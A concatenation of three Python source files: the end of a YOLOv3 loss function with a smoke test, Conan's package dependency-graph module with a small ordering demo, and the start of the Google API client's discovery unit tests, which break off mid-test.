# loss for tw, th. Squared error loss
wh_loss = object_mask * box_loss_scale * 0.5 * K.square(raw_true_wh-raw_pred[...,2:4])
confidence_loss = object_mask * K.binary_crossentropy(object_mask, raw_pred[...,4:5], from_logits=True)+ \
(1-object_mask) * K.binary_crossentropy(object_mask, raw_pred[...,4:5], from_logits=True) * ignore_mask
class_loss = object_mask * K.binary_crossentropy(true_class_probs, raw_pred[...,5:], from_logits=True)
xy_loss = K.sum(xy_loss) / mf
wh_loss = K.sum(wh_loss) / mf
confidence_loss = K.sum(confidence_loss) / mf
class_loss = K.sum(class_loss) / mf
# could we add weights for different losses?
loss += xy_loss + wh_loss + confidence_loss + class_loss
if print_loss:
loss = tf.Print(loss, [loss, xy_loss, wh_loss, confidence_loss, class_loss, K.sum(ignore_mask)], message='loss: ')
return loss
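if __name__ == "__main__":
    # Minimal smoke-test sketch of preprocess_true_boxes(), using the standard
    # COCO YOLOv3 anchors. The single ground-truth box and the class count are
    # illustrative assumptions, not values taken from any dataset.
    coco_anchors = np.array([(10, 13), (16, 30), (33, 23),
                             (30, 61), (62, 45), (59, 119),
                             (116, 90), (156, 198), (373, 326)], dtype='float32')
    true_boxes = np.zeros((1, 20, 5), dtype='float32')  # (batch, max boxes, x_min y_min x_max y_max class)
    true_boxes[0, 0] = [100, 120, 200, 260, 2]          # one 100x140 box of class 2
    y_true = preprocess_true_boxes(true_boxes, (416, 416), coco_anchors, num_classes=3)
    for l, y in enumerate(y_true):
        # Exactly one grid cell/anchor should be marked responsible across the three scales.
        print('scale %d: shape=%s, assigned cells=%d' % (l, y.shape, int(y[..., 4].sum())))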
|
py | b41050ff3c640c272d1cbbf259c0c145783f368f | from conans.model.ref import PackageReference
from conans.model.info import ConanInfo
from conans.errors import conanfile_exception_formatter
from collections import OrderedDict
RECIPE_DOWNLOADED = "Downloaded"
RECIPE_INCACHE = "Cache" # The previously installed recipe in cache is being used
RECIPE_UPDATED = "Updated"
RECIPE_NEWER = "Newer" # The local recipe is modified and newer timestamp than server
RECIPE_NOT_IN_REMOTE = "Not in remote"
RECIPE_UPDATEABLE = "Update available" # The update of the recipe is available (only in conan info)
RECIPE_NO_REMOTE = "No remote"
RECIPE_WORKSPACE = "Workspace"
BINARY_CACHE = "Cache"
BINARY_DOWNLOAD = "Download"
BINARY_UPDATE = "Update"
BINARY_BUILD = "Build"
BINARY_MISSING = "Missing"
BINARY_SKIP = "Skip"
BINARY_WORKSPACE = "Workspace"
class Node(object):
def __init__(self, conan_ref, conanfile):
self.conan_ref = conan_ref
self.conanfile = conanfile
self.dependencies = [] # Ordered Edges
self.dependants = set() # Edges
self.binary = None
self.recipe = None
self.remote = None
self.binary_remote = None
self.build_require = False
def partial_copy(self):
result = Node(self.conan_ref, self.conanfile)
result.dependants = set()
result.dependencies = []
result.binary = self.binary
result.recipe = self.recipe
result.remote = self.remote
result.binary_remote = self.binary_remote
result.build_require = self.build_require
return result
def add_edge(self, edge):
if edge.src == self:
if edge not in self.dependencies:
self.dependencies.append(edge)
else:
self.dependants.add(edge)
def neighbors(self):
return [edge.dst for edge in self.dependencies]
def public_neighbors(self):
return [edge.dst for edge in self.dependencies
if not edge.private and not edge.build_require]
def private_neighbors(self):
return [edge.dst for edge in self.dependencies if edge.private or edge.build_require]
def inverse_neighbors(self):
return [edge.src for edge in self.dependants]
def __eq__(self, other):
return (self.conan_ref == other.conan_ref and
self.conanfile == other.conanfile)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.conan_ref, self.conanfile))
def __repr__(self):
return repr(self.conanfile)
def __cmp__(self, other):
if other is None:
return -1
elif self.conan_ref is None:
return 0 if other.conan_ref is None else -1
elif other.conan_ref is None:
return 1
if self.conan_ref == other.conan_ref:
return 0
if self.conan_ref < other.conan_ref:
return -1
return 1
def __gt__(self, other):
return self.__cmp__(other) == 1
def __lt__(self, other):
return self.__cmp__(other) == -1
def __le__(self, other):
return self.__cmp__(other) in [0, -1]
def __ge__(self, other):
return self.__cmp__(other) in [0, 1]
class Edge(object):
def __init__(self, src, dst, private=False, build_require=False):
self.src = src
self.dst = dst
self.private = private
self.build_require = build_require
def __eq__(self, other):
return self.src == other.src and self.dst == other.dst
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.src, self.dst))
class DepsGraph(object):
def __init__(self):
self.nodes = set()
self.root = None
def add_graph(self, node, graph, build_require=False):
for n in graph.nodes:
if n != graph.root:
n.build_require = build_require
self.add_node(n)
for e in graph.root.dependencies:
e.src = node
e.build_require = build_require
node.dependencies = graph.root.dependencies + node.dependencies
def add_node(self, node):
if not self.nodes:
self.root = node
self.nodes.add(node)
def add_edge(self, src, dst, private=False, build_require=False):
assert src in self.nodes and dst in self.nodes
edge = Edge(src, dst, private, build_require)
src.add_edge(edge)
dst.add_edge(edge)
def compute_package_ids(self):
ordered = self.by_levels()
for level in ordered:
for node in level:
conanfile = node.conanfile
neighbors = node.neighbors()
direct_reqs = [] # of PackageReference
indirect_reqs = set() # of PackageReference, avoid duplicates
for neighbor in neighbors:
nref, nconan = neighbor.conan_ref, neighbor.conanfile
package_id = nconan.info.package_id()
package_reference = PackageReference(nref, package_id)
direct_reqs.append(package_reference)
indirect_reqs.update(nconan.info.requires.refs())
conanfile.options.propagate_downstream(nref, nconan.info.full_options)
# Might never be used, but update the original requirement, just in case
conanfile.requires[nref.name].conan_reference = nref
# Make sure not duplicated
indirect_reqs.difference_update(direct_reqs)
# There might be options that are not upstream, backup them, might be
# for build-requires
conanfile.build_requires_options = conanfile.options.values
conanfile.options.clear_unused(indirect_reqs.union(direct_reqs))
conanfile.info = ConanInfo.create(conanfile.settings.values,
conanfile.options.values,
direct_reqs,
indirect_reqs)
# Once we are done, call package_id() to narrow and change possible values
with conanfile_exception_formatter(str(conanfile), "package_id"):
conanfile.package_id()
return ordered
def full_closure(self, node, private=False):
# Needed to correctly propagate the cpp_info even with private requirements
closure = OrderedDict()
current = node.neighbors()
while current:
new_current = []
for n in current:
closure[n] = n
for n in current:
neighbors = n.public_neighbors() if not private else n.neighbors()
for neigh in neighbors:
if neigh not in new_current and neigh not in closure:
new_current.append(neigh)
current = new_current
return closure
def closure(self, node):
closure = OrderedDict()
current = node.neighbors()
while current:
new_current = []
for n in current:
closure[n.conan_ref.name] = n
for n in current:
neighs = n.public_neighbors()
for neigh in neighs:
if neigh not in new_current and neigh.conan_ref.name not in closure:
new_current.append(neigh)
current = new_current
return closure
def _inverse_closure(self, references):
closure = set()
current = [n for n in self.nodes if str(n.conan_ref) in references or "ALL" in references]
closure.update(current)
while current:
new_current = set()
for n in current:
closure.add(n)
new_neighs = n.inverse_neighbors()
to_add = set(new_neighs).difference(current)
new_current.update(to_add)
current = new_current
return closure
def collapse_graph(self):
"""Computes and return a new graph, that doesn't have duplicated nodes with the same
PackageReference. This is the case for build_requires and private requirements
"""
result = DepsGraph()
result.add_node(self.root.partial_copy())
unique_nodes = {} # {PackageReference: Node (result, unique)}
nodes_map = {self.root: result.root} # {Origin Node: Result Node}
# Add the nodes, without repetition. The "node.partial_copy()" copies the nodes
# without Edges
for node in self.nodes:
if not node.conan_ref:
continue
package_ref = PackageReference(node.conan_ref, node.conanfile.info.package_id())
if package_ref not in unique_nodes:
result_node = node.partial_copy()
result.add_node(result_node)
unique_nodes[package_ref] = result_node
else:
result_node = unique_nodes[package_ref]
nodes_map[node] = result_node
# Compute the new edges of the graph
for node in self.nodes:
result_node = nodes_map[node]
for dep in node.dependencies:
src = result_node
dst = nodes_map[dep.dst]
result.add_edge(src, dst, dep.private, dep.build_require)
for dep in node.dependants:
src = nodes_map[dep.src]
dst = result_node
result.add_edge(src, dst, dep.private, dep.build_require)
return result
def build_order(self, references):
new_graph = self.collapse_graph()
levels = new_graph.inverse_levels()
closure = new_graph._inverse_closure(references)
result = []
for level in reversed(levels):
new_level = [n.conan_ref for n in level if (n in closure and n.conan_ref)]
if new_level:
result.append(new_level)
return result
def nodes_to_build(self):
ret = []
for level in self.by_levels():
for node in level:
if node.binary == BINARY_BUILD:
if node.conan_ref not in ret:
ret.append(node.conan_ref)
return ret
def by_levels(self):
return self._order_levels(True)
def inverse_levels(self):
return self._order_levels(False)
def _order_levels(self, direct):
""" order by node degree. The first level will be the one which nodes dont have
dependencies. Second level will be with nodes that only have dependencies to
first level nodes, and so on
return [[node1, node34], [node3], [node23, node8],...]
"""
current_level = []
result = [current_level]
opened = self.nodes.copy()
while opened:
current = opened.copy()
for o in opened:
o_neighs = o.neighbors() if direct else o.inverse_neighbors()
if not any(n in opened for n in o_neighs):
current_level.append(o)
current.discard(o)
current_level.sort()
# now initialize new level
opened = current
if opened:
current_level = []
result.append(current_level)
return result
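if __name__ == "__main__":
    # Minimal illustrative sketch of the level ordering described in
    # _order_levels(): a tiny app -> libA -> libB chain. Plain strings stand in
    # for the real ConanFileReference/ConanFile objects; the names are
    # assumptions of this sketch only.
    graph = DepsGraph()
    app = Node(None, "app")
    lib_a = Node("libA/1.0@user/channel", "libA")
    lib_b = Node("libB/1.0@user/channel", "libB")
    for n in (app, lib_a, lib_b):
        graph.add_node(n)
    graph.add_edge(app, lib_a)
    graph.add_edge(lib_a, lib_b)
    # Prints [['libB'], ['libA'], ['app']]: leaves first, consumers last.
    print([[n.conanfile for n in level] for level in graph.by_levels()])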
|
py | b41051aecb77dc9a727c8b3b9aa3cb6795f26cec | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Discovery document tests
Unit tests for objects created from discovery documents.
"""
from __future__ import absolute_import
import six
__author__ = '[email protected] (Joe Gregorio)'
from six import BytesIO, StringIO
from six.moves.urllib.parse import urlparse, parse_qs
import copy
import datetime
import httplib2
import itertools
import json
import os
import pickle
import re
import sys
import unittest2 as unittest
import mock
import google.auth.credentials
import google_auth_httplib2
from googleapiclient.discovery import _fix_up_media_upload
from googleapiclient.discovery import _fix_up_method_description
from googleapiclient.discovery import _fix_up_parameters
from googleapiclient.discovery import _urljoin
from googleapiclient.discovery import build
from googleapiclient.discovery import build_from_document
from googleapiclient.discovery import DISCOVERY_URI
from googleapiclient.discovery import key2param
from googleapiclient.discovery import MEDIA_BODY_PARAMETER_DEFAULT_VALUE
from googleapiclient.discovery import MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE
from googleapiclient.discovery import ResourceMethodParameters
from googleapiclient.discovery import STACK_QUERY_PARAMETERS
from googleapiclient.discovery import STACK_QUERY_PARAMETER_DEFAULT_VALUE
from googleapiclient.discovery_cache import DISCOVERY_DOC_MAX_AGE
from googleapiclient.discovery_cache.base import Cache
from googleapiclient.errors import HttpError
from googleapiclient.errors import InvalidJsonError
from googleapiclient.errors import MediaUploadSizeError
from googleapiclient.errors import ResumableUploadError
from googleapiclient.errors import UnacceptableMimeTypeError
from googleapiclient.errors import UnknownApiNameOrVersion
from googleapiclient.errors import UnknownFileType
from googleapiclient.http import build_http
from googleapiclient.http import BatchHttpRequest
from googleapiclient.http import HttpMock
from googleapiclient.http import HttpMockSequence
from googleapiclient.http import MediaFileUpload
from googleapiclient.http import MediaIoBaseUpload
from googleapiclient.http import MediaUpload
from googleapiclient.http import MediaUploadProgress
from googleapiclient.http import tunnel_patch
from googleapiclient.model import JsonModel
from googleapiclient.schema import Schemas
from oauth2client import GOOGLE_TOKEN_URI
from oauth2client.client import OAuth2Credentials, GoogleCredentials
from googleapiclient import _helpers as util
import uritemplate
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
def assertUrisEqual(testcase, expected, actual):
"""Test that URIs are the same, up to reordering of query parameters."""
expected = urlparse(expected)
actual = urlparse(actual)
testcase.assertEqual(expected.scheme, actual.scheme)
testcase.assertEqual(expected.netloc, actual.netloc)
testcase.assertEqual(expected.path, actual.path)
testcase.assertEqual(expected.params, actual.params)
testcase.assertEqual(expected.fragment, actual.fragment)
expected_query = parse_qs(expected.query)
actual_query = parse_qs(actual.query)
for name in list(expected_query.keys()):
testcase.assertEqual(expected_query[name], actual_query[name])
for name in list(actual_query.keys()):
testcase.assertEqual(expected_query[name], actual_query[name])
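# For example, these two URIs compare equal even though their query
# parameters are ordered differently:
#   https://example.com/path?a=1&b=2
#   https://example.com/path?b=2&a=1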
def datafile(filename):
return os.path.join(DATA_DIR, filename)
class SetupHttplib2(unittest.TestCase):
def test_retries(self):
# Merely loading googleapiclient.discovery should set the RETRIES to 1.
self.assertEqual(1, httplib2.RETRIES)
class Utilities(unittest.TestCase):
def setUp(self):
with open(datafile('zoo.json'), 'r') as fh:
self.zoo_root_desc = json.loads(fh.read())
self.zoo_get_method_desc = self.zoo_root_desc['methods']['query']
self.zoo_animals_resource = self.zoo_root_desc['resources']['animals']
self.zoo_insert_method_desc = self.zoo_animals_resource['methods']['insert']
self.zoo_schema = Schemas(self.zoo_root_desc)
def test_key2param(self):
self.assertEqual('max_results', key2param('max-results'))
self.assertEqual('x007_bond', key2param('007-bond'))
def _base_fix_up_parameters_test(
self, method_desc, http_method, root_desc, schema):
self.assertEqual(method_desc['httpMethod'], http_method)
method_desc_copy = copy.deepcopy(method_desc)
self.assertEqual(method_desc, method_desc_copy)
parameters = _fix_up_parameters(method_desc_copy, root_desc, http_method,
schema)
self.assertNotEqual(method_desc, method_desc_copy)
for param_name in STACK_QUERY_PARAMETERS:
self.assertEqual(STACK_QUERY_PARAMETER_DEFAULT_VALUE,
parameters[param_name])
for param_name, value in six.iteritems(root_desc.get('parameters', {})):
self.assertEqual(value, parameters[param_name])
return parameters
def test_fix_up_parameters_get(self):
parameters = self._base_fix_up_parameters_test(
self.zoo_get_method_desc, 'GET', self.zoo_root_desc, self.zoo_schema)
# Since http_method is 'GET'
self.assertFalse('body' in parameters)
def test_fix_up_parameters_insert(self):
parameters = self._base_fix_up_parameters_test(
self.zoo_insert_method_desc, 'POST', self.zoo_root_desc, self.zoo_schema)
body = {
'description': 'The request body.',
'type': 'object',
'$ref': 'Animal',
}
self.assertEqual(parameters['body'], body)
def test_fix_up_parameters_check_body(self):
dummy_root_desc = {}
dummy_schema = {
'Request': {
'properties': {
"description": "Required. Dummy parameter.",
"type": "string"
}
}
}
no_payload_http_method = 'DELETE'
with_payload_http_method = 'PUT'
invalid_method_desc = {'response': 'Who cares'}
valid_method_desc = {
'request': {
'key1': 'value1',
'key2': 'value2',
'$ref': 'Request'
}
}
parameters = _fix_up_parameters(invalid_method_desc, dummy_root_desc,
no_payload_http_method, dummy_schema)
self.assertFalse('body' in parameters)
parameters = _fix_up_parameters(valid_method_desc, dummy_root_desc,
no_payload_http_method, dummy_schema)
self.assertFalse('body' in parameters)
parameters = _fix_up_parameters(invalid_method_desc, dummy_root_desc,
with_payload_http_method, dummy_schema)
self.assertFalse('body' in parameters)
parameters = _fix_up_parameters(valid_method_desc, dummy_root_desc,
with_payload_http_method, dummy_schema)
body = {
'description': 'The request body.',
'type': 'object',
'$ref': 'Request',
'key1': 'value1',
'key2': 'value2',
}
self.assertEqual(parameters['body'], body)
def test_fix_up_parameters_optional_body(self):
# Request with no parameters
dummy_schema = {'Request': {'properties': {}}}
method_desc = {'request': {'$ref': 'Request'}}
parameters = _fix_up_parameters(method_desc, {}, 'POST', dummy_schema)
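# The call itself is the check here: a request body whose schema has no
# required properties must not raise.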
def _base_fix_up_method_description_test(
self, method_desc, initial_parameters, final_parameters,
final_accept, final_max_size, final_media_path_url):
fake_root_desc = {'rootUrl': 'http://root/',
'servicePath': 'fake/'}
fake_path_url = 'fake-path/'
accept, max_size, media_path_url = _fix_up_media_upload(
method_desc, fake_root_desc, fake_path_url, initial_parameters)
self.assertEqual(accept, final_accept)
self.assertEqual(max_size, final_max_size)
self.assertEqual(media_path_url, final_media_path_url)
self.assertEqual(initial_parameters, final_parameters)
def test_fix_up_media_upload_no_initial_invalid(self):
invalid_method_desc = {'response': 'Who cares'}
self._base_fix_up_method_description_test(invalid_method_desc, {}, {},
[], 0, None)
def test_fix_up_media_upload_no_initial_valid_minimal(self):
valid_method_desc = {'mediaUpload': {'accept': []}}
final_parameters = {'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
self._base_fix_up_method_description_test(
valid_method_desc, {}, final_parameters, [], 0,
'http://root/upload/fake/fake-path/')
def test_fix_up_media_upload_no_initial_valid_full(self):
valid_method_desc = {'mediaUpload': {'accept': ['*/*'], 'maxSize': '10GB'}}
final_parameters = {'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
ten_gb = 10 * 2**30
self._base_fix_up_method_description_test(
valid_method_desc, {}, final_parameters, ['*/*'],
ten_gb, 'http://root/upload/fake/fake-path/')
def test_fix_up_media_upload_with_initial_invalid(self):
invalid_method_desc = {'response': 'Who cares'}
initial_parameters = {'body': {}}
self._base_fix_up_method_description_test(
invalid_method_desc, initial_parameters,
initial_parameters, [], 0, None)
def test_fix_up_media_upload_with_initial_valid_minimal(self):
valid_method_desc = {'mediaUpload': {'accept': []}}
initial_parameters = {'body': {}}
final_parameters = {'body': {},
'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
self._base_fix_up_method_description_test(
valid_method_desc, initial_parameters, final_parameters, [], 0,
'http://root/upload/fake/fake-path/')
def test_fix_up_media_upload_with_initial_valid_full(self):
valid_method_desc = {'mediaUpload': {'accept': ['*/*'], 'maxSize': '10GB'}}
initial_parameters = {'body': {}}
final_parameters = {'body': {},
'media_body': MEDIA_BODY_PARAMETER_DEFAULT_VALUE,
'media_mime_type': MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE}
ten_gb = 10 * 2**30
self._base_fix_up_method_description_test(
valid_method_desc, initial_parameters, final_parameters, ['*/*'],
ten_gb, 'http://root/upload/fake/fake-path/')
def test_fix_up_method_description_get(self):
result = _fix_up_method_description(self.zoo_get_method_desc,
self.zoo_root_desc, self.zoo_schema)
path_url = 'query'
http_method = 'GET'
method_id = 'bigquery.query'
accept = []
max_size = 0
media_path_url = None
self.assertEqual(result, (path_url, http_method, method_id, accept,
max_size, media_path_url))
def test_fix_up_method_description_insert(self):
result = _fix_up_method_description(self.zoo_insert_method_desc,
self.zoo_root_desc, self.zoo_schema)
path_url = 'animals'
http_method = 'POST'
method_id = 'zoo.animals.insert'
accept = ['image/png']
max_size = 1024
media_path_url = 'https://www.googleapis.com/upload/zoo/v1/animals'
self.assertEqual(result, (path_url, http_method, method_id, accept,
max_size, media_path_url))
def test_urljoin(self):
# We want to exhaustively test various URL combinations.
simple_bases = ['https://www.googleapis.com', 'https://www.googleapis.com/']
long_urls = ['foo/v1/bar:custom?alt=json', '/foo/v1/bar:custom?alt=json']
long_bases = [
'https://www.googleapis.com/foo/v1',
'https://www.googleapis.com/foo/v1/',
]
simple_urls = ['bar:custom?alt=json', '/bar:custom?alt=json']
final_url = 'https://www.googleapis.com/foo/v1/bar:custom?alt=json'
for base, url in itertools.product(simple_bases, long_urls):
self.assertEqual(final_url, _urljoin(base, url))
for base, url in itertools.product(long_bases, simple_urls):
self.assertEqual(final_url, _urljoin(base, url))
def test_ResourceMethodParameters_zoo_get(self):
parameters = ResourceMethodParameters(self.zoo_get_method_desc)
param_types = {'a': 'any',
'b': 'boolean',
'e': 'string',
'er': 'string',
'i': 'integer',
'n': 'number',
'o': 'object',
'q': 'string',
'rr': 'string'}
keys = list(param_types.keys())
self.assertEqual(parameters.argmap, dict((key, key) for key in keys))
self.assertEqual(parameters.required_params, [])
self.assertEqual(sorted(parameters.repeated_params), ['er', 'rr'])
self.assertEqual(parameters.pattern_params, {'rr': '[a-z]+'})
self.assertEqual(sorted(parameters.query_params),
['a', 'b', 'e', 'er', 'i', 'n', 'o', 'q', 'rr'])
self.assertEqual(parameters.path_params, set())
self.assertEqual(parameters.param_types, param_types)
enum_params = {'e': ['foo', 'bar'],
'er': ['one', 'two', 'three']}
self.assertEqual(parameters.enum_params, enum_params)
def test_ResourceMethodParameters_zoo_animals_patch(self):
method_desc = self.zoo_animals_resource['methods']['patch']
parameters = ResourceMethodParameters(method_desc)
param_types = {'name': 'string'}
keys = list(param_types.keys())
self.assertEqual(parameters.argmap, dict((key, key) for key in keys))
self.assertEqual(parameters.required_params, ['name'])
self.assertEqual(parameters.repeated_params, [])
self.assertEqual(parameters.pattern_params, {})
self.assertEqual(parameters.query_params, [])
self.assertEqual(parameters.path_params, set(['name']))
self.assertEqual(parameters.param_types, param_types)
self.assertEqual(parameters.enum_params, {})
class DiscoveryErrors(unittest.TestCase):
def test_tests_should_be_run_with_strict_positional_enforcement(self):
try:
plus = build('plus', 'v1', None)
self.fail("should have raised a TypeError exception over missing http=.")
except TypeError:
pass
def test_failed_to_parse_discovery_json(self):
self.http = HttpMock(datafile('malformed.json'), {'status': '200'})
try:
plus = build('plus', 'v1', http=self.http, cache_discovery=False)
self.fail("should have raised an exception over malformed JSON.")
except InvalidJsonError:
pass
def test_unknown_api_name_or_version(self):
http = HttpMockSequence([
({'status': '404'}, open(datafile('zoo.json'), 'rb').read()),
({'status': '404'}, open(datafile('zoo.json'), 'rb').read()),
])
with self.assertRaises(UnknownApiNameOrVersion):
plus = build('plus', 'v1', http=http, cache_discovery=False)
def test_credentials_and_http_mutually_exclusive(self):
http = HttpMock(datafile('plus.json'), {'status': '200'})
with self.assertRaises(ValueError):
build(
'plus', 'v1', http=http, credentials=mock.sentinel.credentials)
class DiscoveryFromDocument(unittest.TestCase):
MOCK_CREDENTIALS = mock.Mock(spec=google.auth.credentials.Credentials)
def test_can_build_from_local_document(self):
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=self.MOCK_CREDENTIALS)
self.assertTrue(plus is not None)
self.assertTrue(hasattr(plus, 'activities'))
def test_can_build_from_local_deserialized_document(self):
discovery = open(datafile('plus.json')).read()
discovery = json.loads(discovery)
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=self.MOCK_CREDENTIALS)
self.assertTrue(plus is not None)
self.assertTrue(hasattr(plus, 'activities'))
def test_building_with_base_remembers_base(self):
discovery = open(datafile('plus.json')).read()
base = "https://www.example.com/"
plus = build_from_document(
discovery, base=base, credentials=self.MOCK_CREDENTIALS)
self.assertEquals("https://www.googleapis.com/plus/v1/", plus._baseUrl)
def test_building_with_optional_http_with_authorization(self):
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=self.MOCK_CREDENTIALS)
# plus service requires Authorization, hence we expect to see an AuthorizedHttp object here
self.assertIsInstance(plus._http, google_auth_httplib2.AuthorizedHttp)
self.assertIsInstance(plus._http.http, httplib2.Http)
self.assertIsInstance(plus._http.http.timeout, int)
self.assertGreater(plus._http.http.timeout, 0)
def test_building_with_optional_http_with_no_authorization(self):
discovery = open(datafile('plus.json')).read()
# Cleanup auth field, so we would use plain http client
discovery = json.loads(discovery)
discovery['auth'] = {}
discovery = json.dumps(discovery)
plus = build_from_document(
discovery, base="https://www.googleapis.com/",
credentials=None)
# plus service requires Authorization
self.assertIsInstance(plus._http, httplib2.Http)
self.assertIsInstance(plus._http.timeout, int)
self.assertGreater(plus._http.timeout, 0)
def test_building_with_explicit_http(self):
http = HttpMock()
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/", http=http)
self.assertEquals(plus._http, http)
def test_building_with_developer_key_skips_adc(self):
discovery = open(datafile('plus.json')).read()
plus = build_from_document(
discovery, base="https://www.googleapis.com/", developerKey='123')
self.assertIsInstance(plus._http, httplib2.Http)
# It should not be an AuthorizedHttp, because that would indicate that
# application default credentials were used.
self.assertNotIsInstance(plus._http, google_auth_httplib2.AuthorizedHttp)
class DiscoveryFromHttp(unittest.TestCase):
def setUp(self):
self.old_environ = os.environ.copy()
def tearDown(self):
os.environ = self.old_environ
def test_userip_is_added_to_discovery_uri(self):
# build() will raise an HttpError on a 400, use this to pick the request uri
# out of the raised exception.
os.environ['REMOTE_ADDR'] = '10.0.0.1'
try:
http = HttpMockSequence([
({'status': '400'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, developerKey=None,
discoveryServiceUrl='http://example.com')
self.fail('Should have raised an exception.')
except HttpError as e:
self.assertEqual(e.uri, 'http://example.com?userIp=10.0.0.1')
def test_userip_missing_is_not_added_to_discovery_uri(self):
# build() will raise an HttpError on a 400, use this to pick the request uri
# out of the raised exception.
try:
http = HttpMockSequence([
({'status': '400'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, developerKey=None,
discoveryServiceUrl='http://example.com')
self.fail('Should have raised an exception.')
except HttpError as e:
self.assertEqual(e.uri, 'http://example.com')
def test_key_is_added_to_discovery_uri(self):
# build() will raise an HttpError on a 400, use this to pick the request uri
# out of the raised exception.
try:
http = HttpMockSequence([
({'status': '400'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, developerKey='foo',
discoveryServiceUrl='http://example.com')
self.fail('Should have raised an exception.')
except HttpError as e:
self.assertEqual(e.uri, 'http://example.com?key=foo')
def test_discovery_loading_from_v2_discovery_uri(self):
http = HttpMockSequence([
({'status': '404'}, 'Not found'),
({'status': '200'}, open(datafile('zoo.json'), 'rb').read()),
])
zoo = build('zoo', 'v1', http=http, cache_discovery=False)
self.assertTrue(hasattr(zoo, 'animals'))
class DiscoveryFromAppEngineCache(unittest.TestCase):
def test_appengine_memcache(self):
# Hack module import
self.orig_import = __import__
self.mocked_api = mock.MagicMock()
def import_mock(name, *args, **kwargs):
if name == 'google.appengine.api':
return self.mocked_api
return self.orig_import(name, *args, **kwargs)
import_fullname = '__builtin__.__import__'
if sys.version_info[0] >= 3:
import_fullname = 'builtins.__import__'
with mock.patch(import_fullname, side_effect=import_mock):
namespace = 'google-api-client'
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
self.mocked_api.memcache.get.return_value = None
plus = build('plus', 'v1', http=self.http)
# memcache.get is called once
url = 'https://www.googleapis.com/discovery/v1/apis/plus/v1/rest'
self.mocked_api.memcache.get.assert_called_once_with(url,
namespace=namespace)
# memcache.set is called once
with open(datafile('plus.json')) as f:
content = f.read()
self.mocked_api.memcache.set.assert_called_once_with(
url, content, time=DISCOVERY_DOC_MAX_AGE, namespace=namespace)
# Returns the cached content this time.
self.mocked_api.memcache.get.return_value = content
# Make sure the contents are returned from the cache.
# (Otherwise it would throw an error.)
self.http = HttpMock(None, {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# memcache.get is called twice
self.mocked_api.memcache.get.assert_has_calls(
[mock.call(url, namespace=namespace),
mock.call(url, namespace=namespace)])
# memcache.set is called just once
self.mocked_api.memcache.set.assert_called_once_with(
url, content, time=DISCOVERY_DOC_MAX_AGE,namespace=namespace)
class DictCache(Cache):
def __init__(self):
self.d = {}
def get(self, url):
return self.d.get(url, None)
def set(self, url, content):
self.d[url] = content
def contains(self, url):
return url in self.d
class DiscoveryFromFileCache(unittest.TestCase):
def test_file_based_cache(self):
cache = mock.Mock(wraps=DictCache())
with mock.patch('googleapiclient.discovery_cache.autodetect',
return_value=cache):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# cache.get is called once
url = 'https://www.googleapis.com/discovery/v1/apis/plus/v1/rest'
cache.get.assert_called_once_with(url)
# cache.set is called once
with open(datafile('plus.json')) as f:
content = f.read()
cache.set.assert_called_once_with(url, content)
# Make sure there is a cache entry for the plus v1 discovery doc.
self.assertTrue(cache.contains(url))
# Make sure the contents are returned from the cache.
# (Otherwise it would throw an error.)
self.http = HttpMock(None, {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# cache.get is called twice
cache.get.assert_has_calls([mock.call(url), mock.call(url)])
# cache.set is called just once
cache.set.assert_called_once_with(url, content)
class Discovery(unittest.TestCase):
def test_method_error_checking(self):
self.http = HttpMock(datafile('plus.json'), {'status': '200'})
plus = build('plus', 'v1', http=self.http)
# Missing required parameters
try:
plus.activities().list()
self.fail()
except TypeError as e:
self.assertTrue('Missing' in str(e))
# Missing required parameters even if supplied as None.
try:
plus.activities().list(collection=None, userId=None)
self.fail()
except TypeError as e:
self.assertTrue('Missing' in str(e))
# Parameter doesn't match regex
try:
plus.activities().list(collection='not_a_collection_name', userId='me')
self.fail()
except TypeError as e:
self.assertTrue('not an allowed value' in str(e))
# Unexpected parameter
try:
plus.activities().list(flubber=12)
self.fail()
except TypeError as e:
self.assertTrue('unexpected' in str(e))
def _check_query_types(self, request):
parsed = urlparse(request.uri)
q = parse_qs(parsed[4])
self.assertEqual(q['q'], ['foo'])
self.assertEqual(q['i'], ['1'])
self.assertEqual(q['n'], ['1.0'])
self.assertEqual(q['b'], ['false'])
self.assertEqual(q['a'], ['[1, 2, 3]'])
self.assertEqual(q['o'], ['{\'a\': 1}'])
self.assertEqual(q['e'], ['bar'])
def test_type_coercion(self):
http = HttpMock(datafile('zoo.json'), {'status': '200'})
zoo = build('zoo', 'v1', http=http)
request = zoo.query(
q="foo", i=1.0, n=1.0, b=0, a=[1,2,3], o={'a':1}, e='bar')
self._check_query_types(request)
request = zoo.query(
